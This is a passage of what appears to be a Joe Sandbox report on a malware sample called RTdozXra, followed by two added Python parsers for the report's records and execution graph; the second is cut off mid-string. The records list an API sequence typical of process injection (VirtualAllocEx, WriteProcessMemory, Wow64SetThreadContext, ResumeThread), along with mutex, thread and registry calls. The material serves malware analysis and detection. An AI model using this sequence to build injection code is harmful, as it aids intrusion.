                          • Opcode Fuzzy Hash: 8d1e548b22e47d3c4c8ec0aae496f6b60a83059fbe06300c52fe21c772074888
                          • Instruction Fuzzy Hash: CC2148B1D003098FDB10DFAAD885BEEBFF4EB48224F54842AD419A7240DB789945CFA4
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0749D258
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 36426f343ca6b15dcbf9ee18f69dfb8b1a24a88475812068d563903577d81e00
                          • Instruction ID: fb8eda4ca2a80abe9344e35ad4860e7d2b647a093bc255f6502cd0f5ecbbe634
                          • Opcode Fuzzy Hash: 36426f343ca6b15dcbf9ee18f69dfb8b1a24a88475812068d563903577d81e00
                          • Instruction Fuzzy Hash: B821F6B1D003599FDB10DFAAD841BEEBBF5FF48310F50842AE918A7240D7399541CBA5
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0749D178
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 5af8ed22c12df2ccef234a960ff7b90e1cd15013f6cd7dbe729a62d58e3c3c86
                          • Instruction ID: 1a64208592a37d38508cdc5736b20ee786ecd6045491f36404f341975a9bff04
                          • Opcode Fuzzy Hash: 5af8ed22c12df2ccef234a960ff7b90e1cd15013f6cd7dbe729a62d58e3c3c86
                          • Instruction Fuzzy Hash: 562113B2D003499FDB10DFAAC881BDEBBF5FB48310F50842AE918A7240D7799941CBA4
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0555A277
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1389981190.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_5550000_RTdozXra.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          • Opcode ID: 034e933f74dc6a9832d5e6adbcec295b82d3380091cce807e0aff031b65bbb0f
                          • Instruction ID: c618178e72ce0de2fa792946359c5443c5ec548ef9dc2850842471b5de385c55
                          • Opcode Fuzzy Hash: 034e933f74dc6a9832d5e6adbcec295b82d3380091cce807e0aff031b65bbb0f
                          • Instruction Fuzzy Hash: CB21EEB5D003099FDB10CF9AD880A9EFBF5FB48320F54842AE819A7210D775A945CFA0
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0144D98F
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 39393b587e4dfe9e1cce07a2606187590fba975ac599a9bf4d639c61be8bbace
                          • Instruction ID: 23a49f7949dacdb696fd6241489f6487fa3f41879dad4fb15312a0b7935999a9
                          • Opcode Fuzzy Hash: 39393b587e4dfe9e1cce07a2606187590fba975ac599a9bf4d639c61be8bbace
                          • Instruction Fuzzy Hash: 412103B5D002089FDB10CF99D985AEEBBF5FB08310F14841AE958A3310D338A940CFA1
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0749D258
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 1ecfad65788a09867081df1d8aea083f4807cbc30038d6cb55b19d1a248686b6
                          • Instruction ID: 937fff91a4eb63627e24e82cc95298c7930d471d9f3edfa6eceffbab99f80db2
                          • Opcode Fuzzy Hash: 1ecfad65788a09867081df1d8aea083f4807cbc30038d6cb55b19d1a248686b6
                          • Instruction Fuzzy Hash: DA21E4B1D003599FDB10DFAAC881BEEBBF5FF48310F50842AE919A7240D7799941CBA4
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0749CB96
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: de0ec8f92e16f3625f83113f943b12de487ab94ef8421b298f5badc12c10af97
                          • Instruction ID: f747059b46bc08e6732a7e3e5a04e70425570920110041d3ce3cd8b6fd9c5e7a
                          • Opcode Fuzzy Hash: de0ec8f92e16f3625f83113f943b12de487ab94ef8421b298f5badc12c10af97
                          • Instruction Fuzzy Hash: 7A2134B1D003098FDB10DFAAC485BEEBBF4AB48320F54842AD859A7240DB789945CFA4
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0144D98F
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 90bc3d31554213708d3609cfd3b93f3c3ab126853e8d734d576af8438b481c95
                          • Instruction ID: e83cb4f648023206bce92097a6158c922d35f9ce108a5f94d6e84bea691748b4
                          • Opcode Fuzzy Hash: 90bc3d31554213708d3609cfd3b93f3c3ab126853e8d734d576af8438b481c95
                          • Instruction Fuzzy Hash: 0621E4B5D002499FDB10CF9AD884ADEFBF5FB48310F14841AE954A3350D378A940CFA5
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0749D096
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: e7fc62bcdb1ea4325818c346d90fbd5cffd38e19ab14558a48a9b981c04abfdd
                          • Instruction ID: 98e2cff0136bd1484981432c64f61dd6b51199518e4126df3db1c5c92cb69a55
                          • Opcode Fuzzy Hash: e7fc62bcdb1ea4325818c346d90fbd5cffd38e19ab14558a48a9b981c04abfdd
                          • Instruction Fuzzy Hash: CA113675D002499FDB20DFA9C845BDEBFF5AB48324F14841AE955A7250C7759501CFA0
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 152673698d947f1f6fb6c0575f56797cfb948b89bd6dc75f2610fae1b25f5edc
                          • Instruction ID: db1a0d88802d2c894b78dce2148e638bf4e001fe16e3b756905309750a55c481
                          • Opcode Fuzzy Hash: 152673698d947f1f6fb6c0575f56797cfb948b89bd6dc75f2610fae1b25f5edc
                          • Instruction Fuzzy Hash: D11149B1C003498FDB20DFAAD8457DFFFF9AB88224F14882AD515A7640CB796541CBA4
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0749D096
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 88956e8a721e2ed3c2fcb8d022387dff17a84c9dd470d5360dd284b8bba091ca
                          • Instruction ID: 65ab34b25ed78aa6403a1dde6468c3e0f0593a24794c064a28df2a91c7140ea3
                          • Opcode Fuzzy Hash: 88956e8a721e2ed3c2fcb8d022387dff17a84c9dd470d5360dd284b8bba091ca
                          • Instruction Fuzzy Hash: 7C112675D003499FDB20DFAAC845BDEBFF5EB48320F14881AE515A7250CB759941CFA4
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 075A11F5
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1394019072.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_75a0000_RTdozXra.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 514a03d7e2e9819e08c23c33589af7013a01351ca8e5aa1ac543a4fe1f35fe21
                          • Instruction ID: aee9e82b57372f7be3960f08da28a7cfadb4fd1ff0e13b1530e7f1903cfa22f5
                          • Opcode Fuzzy Hash: 514a03d7e2e9819e08c23c33589af7013a01351ca8e5aa1ac543a4fe1f35fe21
                          • Instruction Fuzzy Hash: E41113BA8003499FDB20DF9AD845BDEBFF8FB48324F10841AE514A7240C375A944CFA1
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: cd70f584199b5fe2bb0c9ef11f4af60b4eb5a51a6a7905f7aed8b2e2404deb5b
                          • Instruction ID: 0dc44474e42c69ba4b5f5af16d53f01caefdd972c0beb7277c797ff3be1d9842
                          • Opcode Fuzzy Hash: cd70f584199b5fe2bb0c9ef11f4af60b4eb5a51a6a7905f7aed8b2e2404deb5b
                          • Instruction Fuzzy Hash: 461128B1D003498FDB20DFAAC4457DEFBF5AB88224F14882AD519A7240CB796941CBA4
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0144B67E
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 906e7ce8e9683a2456b2266f77f8d0c5def3bf025621676a860791451b4000ba
                          • Instruction ID: 9edd7837f6278045d4d7ab4371df1c8c26c33d987b23f256ea40bfa33ba467b3
                          • Opcode Fuzzy Hash: 906e7ce8e9683a2456b2266f77f8d0c5def3bf025621676a860791451b4000ba
                          • Instruction Fuzzy Hash: D911DFB5C007498FEB20DF9AD444B9EFBF5EB88224F10842AD929A7210D379A545CFA5
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0555A277
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1389981190.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_5550000_RTdozXra.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          • Opcode ID: 4ddf30618860be42962bf243c243602614cc222e4f3d862fd1cc26ea74e84526
                          • Instruction ID: 940f470fd79425ea813ff8598b5bf16cc2e42e260dcab48b3ca5a0b530ccbe50
                          • Opcode Fuzzy Hash: 4ddf30618860be42962bf243c243602614cc222e4f3d862fd1cc26ea74e84526
                          • Instruction Fuzzy Hash: 2B019EB29003099FDF108FD9D845BDEBBF5FB88320F98851AE805A7250C779D881CB60
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 075A11F5
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1394019072.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_75a0000_RTdozXra.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 1965ee543da7a5bb009f20bcd7efee63f73d668465c3397a087aca6d5aa5a059
                          • Instruction ID: 1c0cbdb567f7756e13209e422a7b6ece9094055b719ccc43b60be7ac1630020e
                          • Opcode Fuzzy Hash: 1965ee543da7a5bb009f20bcd7efee63f73d668465c3397a087aca6d5aa5a059
                          • Instruction Fuzzy Hash: 7811D3B58003499FDB20DF9AD945BDEFBF8FB48320F10841AE558A7240D375A944CFA1
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1364980196.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11ed000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 04199fe4a25b037adbc816af861cc0194afd18cfec0f335b6222ae451913e65d
                          • Instruction ID: 97647ea172e4affe2d213c50de3d2d9814b17952451fe8de9e8502636d56226e
                          • Opcode Fuzzy Hash: 04199fe4a25b037adbc816af861cc0194afd18cfec0f335b6222ae451913e65d
                          • Instruction Fuzzy Hash: 8C213671504604DFDF19DF84E9C8B56BBA5FBA4324F20C169E8090F646C336E446CBA2
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1364980196.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11ed000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bb0e7637398e6c9ec116e3f4f0425affa5c31e6783adb2f0175f48582d89389b
                          • Instruction ID: f463579abfa0f560a6e18c9f917ff47fd46daaff426de1b13d4a1b110efa9e34
                          • Opcode Fuzzy Hash: bb0e7637398e6c9ec116e3f4f0425affa5c31e6783adb2f0175f48582d89389b
                          • Instruction Fuzzy Hash: E6210671504640DFDF19DF94E9C8B26BFB5FB84318F24C569D8050B256C336D456CBA2
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1365029097.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11fd000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 13794409a39e38d5a081b674387dec987c849dea83603539986696ae49684c8d
                          • Instruction ID: 7491c787da90909f6c42242d79ddcb8a9c79b2cf68bd7e4dc5ebed75206b259d
                          • Opcode Fuzzy Hash: 13794409a39e38d5a081b674387dec987c849dea83603539986696ae49684c8d
                          • Instruction Fuzzy Hash: C7212271604300DFDF19DF54E9C4B26BB61EB84314F20C6ADEA0A4B386C336D807CA62
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1365029097.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11fd000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2f7a296ccc2161fb71be784f867b39864c46110953c7aee1e01cc223df27368d
                          • Instruction ID: 235df789ae218eb38418105323c4d190912505553ea39b1d7ba9c4d60edca704
                          • Opcode Fuzzy Hash: 2f7a296ccc2161fb71be784f867b39864c46110953c7aee1e01cc223df27368d
                          • Instruction Fuzzy Hash: 13210779604300DFDF19DF94E9C4B26BB65FB84324F20C56DEA494B256C336D446CAA2
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1365029097.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11fd000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e97a630965075ff6fd2852d8d0032f8c24943a70e4eaf36e7529cf5c194c12e1
                          • Instruction ID: 8fdba49c0a5557d4b42ab9c2b201303bbd852304e64042943590de2d43968c35
                          • Opcode Fuzzy Hash: e97a630965075ff6fd2852d8d0032f8c24943a70e4eaf36e7529cf5c194c12e1
                          • Instruction Fuzzy Hash: B821AE755093808FCB07CF24D990B15BF71EB46214F28C5EED9498F6A7C33A980ACB62
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1364980196.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11ed000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                          • Instruction ID: 504a71e13bc4a5db65144db4273cc20f3a3a9408ba528cd7f1c0fa1146dc7678
                          • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                          • Instruction Fuzzy Hash: 8111CD76504680CFCF06CF84D5C4B56BFA2FB94324F2482A9D8090A656C33AE456CBA2
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1364980196.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11ed000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                          • Instruction ID: 19ade1dc348b1a7f4e7d1965bbc7aab8eb57c1be8580d2d074ad2060902bb803
                          • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                          • Instruction Fuzzy Hash: 8111AF76504680CFCF16CF54E9C4B16BFB2FB84324F24C6A9D8490B656C336D456CBA2
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1365029097.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11fd000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                          • Instruction ID: dd30b6fd3983e5965601338168f49421bd9e6f4e628ee86a2786c56f03c41fae
                          • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                          • Instruction Fuzzy Hash: EA11BE79504240DFCB06CF54D5C0B25BB61FB84324F24C6AED9494B296C33AD40ACB92
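The function records above repeat the same few fields per lifted function: an Opcode ID (hash of the opcode sequence), an Instruction ID (hash of the full instruction bytes, operands included), fuzzy variants of both, and the memory dump the function came from. Two records that share an Opcode ID but differ in Instruction ID are the same code shape with different operands, which is how the two 099256442a... records above relate. The following parser is an added example, not part of the Joe Sandbox report or its tooling: it reads records in this layout, groups them by Opcode ID and pulls the process index, dump index and base out of the .sdmp file name. Reading the fifth name field as the page protection (0x40 = PAGE_EXECUTE_READWRITE) is an assumption; the sample input is trimmed to the fields the parser uses.

```python
"""Parse Joe Sandbox function records ("Memory Dump Source" / "Similarity" blocks)
and group them by Opcode ID.  Added example, not Joe Sandbox code."""
import re
from collections import defaultdict

# Constructed input: three records copied from the report above, trimmed to the
# fields used here.  Records 2 and 3 share an Opcode ID but not an Instruction ID.
SAMPLE_RECORDS = """\
APIs
• PostMessageW.USER32(?,?,?,?), ref: 075A11F5
Memory Dump Source
• Source File: 0000000B.00000002.1394019072.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_75a0000_RTdozXra.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 1965ee543da7a5bb009f20bcd7efee63f73d668465c3397a087aca6d5aa5a059
• Instruction ID: 1c0cbdb567f7756e13209e422a7b6ece9094055b719ccc43b60be7ac1630020e
Memory Dump Source
• Source File: 0000000B.00000002.1364980196.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
• API ID:
• Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
• Instruction ID: 504a71e13bc4a5db65144db4273cc20f3a3a9408ba528cd7f1c0fa1146dc7678
• Instruction Fuzzy Hash: 8111CD76504680CFCF06CF84D5C4B56BFA2FB94324F2482A9D8090A656C33AE456CBA2
Memory Dump Source
• Source File: 0000000B.00000002.1364980196.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
• API ID:
• Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
• Instruction ID: 19ade1dc348b1a7f4e7d1965bbc7aab8eb57c1be8580d2d074ad2060902bb803
• Instruction Fuzzy Hash: 8111AF76504680CFCF16CF54E9C4B16BFB2FB84324F24C6A9D8490B656C336D456CBA2
"""

KV_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
# .sdmp name: <process index>.<dump index>.<id>.<base>.<protect>... ; the first, second
# and fourth fields match the snapshot name (hcaresult_11_2_11ed000).  Treating the
# fifth field as the page protection (0x40 = PAGE_EXECUTE_READWRITE) is an ASSUMPTION.
SDMP_RE = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.\d+\.([0-9A-F]{16})\.([0-9A-F]{8})\.")

def parse_source_file(value):
    name, rest = (value.split(",", 1) + [""])[:2]
    info = {"sdmp": name.strip(), "based_on_pe": "based on PE: true" in rest}
    m = SDMP_RE.match(info["sdmp"])
    if m:
        info.update(process_index=int(m.group(1), 16), dump_index=int(m.group(2), 16),
                    base=int(m.group(3), 16), protect=int(m.group(4), 16))
    off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", rest)
    if off:
        info["offset"] = int(off.group(1), 16)
    return info

def parse_records(text):
    """One record per 'Memory Dump Source' block; the 'APIs' list before it belongs to it."""
    records, current, pending_apis = [], None, []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            pending_apis = []
        elif API_RE.match(line):
            f, mod, args, ref = API_RE.match(line).groups()
            pending_apis.append({"function": f, "module": mod, "args": args, "ref": ref})
        elif line == "Memory Dump Source":
            current = {"apis": pending_apis}
            pending_apis = []
            records.append(current)
        elif current is not None and KV_RE.match(line):
            key, value = KV_RE.match(line).groups()
            if key == "Source File":
                current["source"] = parse_source_file(value)
            else:
                current[key] = value
    return records

def shared_opcode_shapes(records):
    """Opcode IDs seen in more than one record with differing Instruction IDs."""
    groups = defaultdict(list)
    for r in records:
        if "Opcode ID" in r:
            groups[r["Opcode ID"]].append(r.get("Instruction ID"))
    return {oid: sorted(set(iids)) for oid, iids in groups.items()
            if len(iids) > 1 and len(set(iids)) > 1}

def rwx_dumps(records):
    """Distinct dump bases whose (assumed) protection field is PAGE_EXECUTE_READWRITE."""
    return sorted({r["source"]["base"] for r in records
                   if r.get("source", {}).get("protect") == 0x40})

if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for oid, iids in shared_opcode_shapes(recs).items():
        print(f"opcode {oid[:12]}... has {len(iids)} operand variants")
    print("RWX dump bases:", [hex(b) for b in rwx_dumps(recs)])
```

Grouping on Opcode ID rather than Instruction ID is what makes relocated or re-unpacked copies of a function line up across dumps; the fuzzy hashes serve the same purpose when even the opcode sequence has been lightly changed.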

                          Execution Graph

                          Execution Coverage:1.8%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:3.6%
                          Total number of Nodes:643
                          Total number of Limit Nodes:13
                          Graph nodes carrying resolved API or runtime symbols (function start address followed by the calls made there). Count-only nodes such as "28 API calls" and the node-to-node edges of the interactive graph are omitted from this text rendering.
                          • 404e06 WaitForSingleObject
                          • 404e20 SetEvent CloseHandle
                          • 404e37 closesocket
                          • 404e6c WaitForSingleObject
                          • 404e7b SetEvent WaitForSingleObject
                          • 404e93 SetEvent CloseHandle CloseHandle
                          • 404eae SetEvent CloseHandle
                          • 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection
                          • 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8
                          • 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8
                          • 443672 RtlAllocateHeap
                          • 44303d RtlAllocateHeap
                          • 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail
                          • 4329da IsProcessorFeaturePresent
                          • 432d56 IsProcessorFeaturePresent
                          • 432d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess
                          • 41a8da LoadLibraryA GetProcAddress
                          • 41a909 GetModuleHandleA GetProcAddress
                          • 41a919 LoadLibraryA GetProcAddress
                          • 41a937 GetModuleHandleA GetProcAddress
                          • 41a947 GetModuleHandleA GetProcAddress
                          • 41a95f GetModuleHandleA GetProcAddress
                          • 4407f6 GetModuleHandleW
                          • 40d5fc OpenMutexA
                          • 40d60f WaitForSingleObject CloseHandle
                          • 40d660 CreateMutexA GetLastError
                          • 40d68a GetModuleFileNameW
                          • 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey
                          • 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey
                          • 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey
                          • 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail
                          • 40da70 CreateThread
                          • 40db6c CreateThread
                          • 40dbbd CreateThread
                          • 40dc39 CreateThread
                          • 40dcb6 CreateThread
                          • 40dcd9 CreateThread
                          • 40dcee CreateThread
                          • Nodes reached directly from the CreateThread nodes: 41b212 (10 API calls), 417f6a (101 API calls, 2 library calls), 40e18d (122 API calls), 410b5c (137 API calls), 411140 (38 API calls ___scrt_fastfail), 401bc9 (49 API calls _strftime)
                          • 419493 FindResourceA
                          • 4194b0 LoadResource LockResource SizeofResource
                          • 4328dc GetStartupInfoW
                          • 4474f0 GetStdHandle GetFileType
                          • 442d9a EnterCriticalSection
                          • 442df9 EnterCriticalSection _Atexit
                          • 43393c EnterCriticalSection
                          • 43394a LeaveCriticalSection
                          • 442de2 LeaveCriticalSection
                          • 4475f3 LeaveCriticalSection std::_Lockit::~_Lockit
                          • 44d3f2 LeaveCriticalSection std::_Lockit::~_Lockit
                          • 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer
                          • 436ec6 RaiseException
                          • 44083a GetModuleHandleExW
                          • 440864 GetProcAddress
                          • 44088d FreeLibrary
                          • 4407c3 GetPEB
                          • 4407d3 GetCurrentProcess TerminateProcess
                          • 4407eb ExitProcess
                          • 445a55 GetProcAddress
                          • 445ab6 LoadLibraryExW
                          • 445ad3 GetLastError
                          • 445ade LoadLibraryExW
                          • 445b02 FreeLibrary
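The raw execution graph is a token stream: each node is a numeric id, a function start address and the API or runtime symbols resolved at that node, and each edge is `parent->child`. Questions such as "which path leads from the mutex check to CreateMutexA" or "which APIs are reachable from the socket teardown routine" are easier to answer from a parsed graph than from the dump. The following parser and BFS are an added example, not part of the Joe Sandbox report or its tooling; the sample input is two clusters copied from the dump above (the event/socket teardown around 404e06 and the mutex check around 40d5fc) with edges that leave the excerpt trimmed away.

```python
"""Parse the Joe Sandbox execution-graph token stream and answer call-path
questions over it.  Added example, not Joe Sandbox code."""
import re
from collections import deque

# Constructed input: two clusters copied from the graph dump above; edges to
# nodes outside the excerpt were removed so the sample is self-contained.
SAMPLE_GRAPH = (
    "execution_graph 45803 404e06 WaitForSingleObject 45804 404e20 SetEvent CloseHandle "
    "45803->45804 45805 404e37 closesocket 45803->45805 45806 404eb8 45804->45806 "
    "45807 404e44 45805->45807 45808 404e5a 45807->45808 45816 4050c4 83 API calls "
    "45807->45816 45809 404e6c WaitForSingleObject 45808->45809 45810 404eae SetEvent "
    "CloseHandle 45808->45810 45817 41c4c6 DeleteCriticalSection EnterCriticalSection "
    "LeaveCriticalSection 45809->45817 45810->45806 45813 404e7b SetEvent "
    "WaitForSingleObject 45818 41c4c6 DeleteCriticalSection EnterCriticalSection "
    "LeaveCriticalSection 45813->45818 45815 404e93 SetEvent CloseHandle CloseHandle "
    "45815->45810 45816->45808 45817->45813 45818->45815 "
    "45949 40d650 45955 40d660 CreateMutexA GetLastError 45949->45955 45954 40d5f5 "
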